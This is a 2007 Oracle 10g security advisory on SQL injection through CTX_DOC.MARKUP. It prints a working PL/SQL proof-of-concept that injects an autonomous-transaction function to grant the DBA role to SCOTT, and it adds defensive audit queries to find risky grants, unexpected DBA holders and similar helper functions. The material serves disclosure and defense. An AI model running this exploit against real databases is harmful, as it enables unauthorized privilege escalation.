SQL Injection via Oracle CTX_DOC.Markup in Oracle 10g


Name: SQL Injection via Oracle CTX_DOC.Markup in Oracle 10g
Systems Affected: Oracle 10g
Severity: High Risk
Category: SQL Injection
Vendor URL: http://www.oracle.com/
Credit Exploit: Alexandr "Sh2kerr" Polyakov
Exploit: milw0rm
Date: 23 Oct 2007 (V 1.00)

Details

The following proof-of-concept exploit code injects a function into ctx_doc and grants the DBA role to the user SCOTT. The exploit works on Oracle 10g.


Example
CREATE OR REPLACE FUNCTION HACKIT return varchar2
authid current_user as
pragma autonomous_transaction;
BEGIN
EXECUTE IMMEDIATE 'grant dba to scott';
COMMIT;
RETURN '';
END;
/


set serveroutput on

create table mark_tab (id number primary key, text varchar2(80) );

insert into mark_tab values ('1', 'All your bases are belong to US');

create index mark_tab_idx on mark_tab(text)
        indextype is ctxsys.context parameters
        ('filter ctxsys.null_filter');


SET SERVEROUTPUT ON;
DECLARE
     mklob CLOB;
     amt NUMBER := 40;
     line VARCHAR2(80);
BEGIN
     CTX_DOC.MARKUP('mark_tab_idx','1',''||scott.HACKIT()||'', mklob);
     DBMS_LOB.READ(mklob, amt, 1, line);
     DBMS_OUTPUT.PUT_LINE('QWRvcmUuVS5NeS5TdGFy'||line);
     DBMS_LOB.FREETEMPORARY(mklob);
END;
/


Patch Information
Revoke the grants or apply the patches mentioned in Oracle Critical Patch Update October 2007.
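
The "revoke the grants" mitigation, together with a check for the effect the proof of concept aims at, written as audit queries to run as a DBA. This is an added example, not part of the original advisory; the PUBLIC grantee and the schema exclusion lists are assumptions to replace with your own baseline.

```sql
-- Added example: audit queries for the mitigation described above.
-- Run as a DBA (for example in SQL*Plus). Nothing here changes data
-- unless the commented REVOKE in step 2 is enabled.

-- 1. Who can execute the affected package? Every row is a grant to review.
SELECT grantee, privilege, grantable, grantor
FROM   dba_tab_privs
WHERE  owner      = 'CTXSYS'
AND    table_name = 'CTX_DOC'
AND    privilege  = 'EXECUTE'
ORDER  BY grantee;

-- 2. Revoke a grant that is not needed. PUBLIC is an assumed grantee;
--    use the grantees returned by query 1. Schemas that really use
--    Oracle Text document services need a direct grant afterwards.
-- REVOKE EXECUTE ON ctxsys.ctx_doc FROM PUBLIC;

-- 3. Detect the outcome the proof of concept produces: an unexpected
--    holder of the DBA role. The exclusion list is an assumed baseline.
SELECT grantee, admin_option, default_role
FROM   dba_role_privs
WHERE  granted_role = 'DBA'
AND    grantee NOT IN ('SYS', 'SYSTEM')
ORDER  BY grantee;

-- 4. Find helper functions shaped like the one in the proof of concept:
--    stored code in non-system schemas that uses an autonomous
--    transaction and issues a GRANT through dynamic SQL.
--    The excluded owners are an assumed baseline.
SELECT DISTINCT a.owner, a.name, a.type
FROM   dba_source a
WHERE  UPPER(a.text) LIKE '%AUTONOMOUS_TRANSACTION%'
AND    a.owner NOT IN ('SYS', 'SYSTEM', 'CTXSYS')
AND    EXISTS (SELECT 1
               FROM   dba_source b
               WHERE  b.owner = a.owner
               AND    b.name  = a.name
               AND    b.type  = a.type
               AND    UPPER(b.text) LIKE '%EXECUTE IMMEDIATE%'
               AND    UPPER(b.text) LIKE '%GRANT%')
ORDER  BY a.owner, a.name;
```

Query 4 matches on source text, so wrapped code or a GRANT string split across lines will not show up; treat an empty result as one signal, not as proof.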




2007 by Red-Database-Security GmbH - last update 28-nov-2007

Definition Exploit
An exploit is a common term in computer security for a piece of software that takes advantage of a bug or vulnerability, leading to a privilege escalation or denial of service (DoS) on a computer system.
Computer security experts use exploit code to test whether a patch is working properly.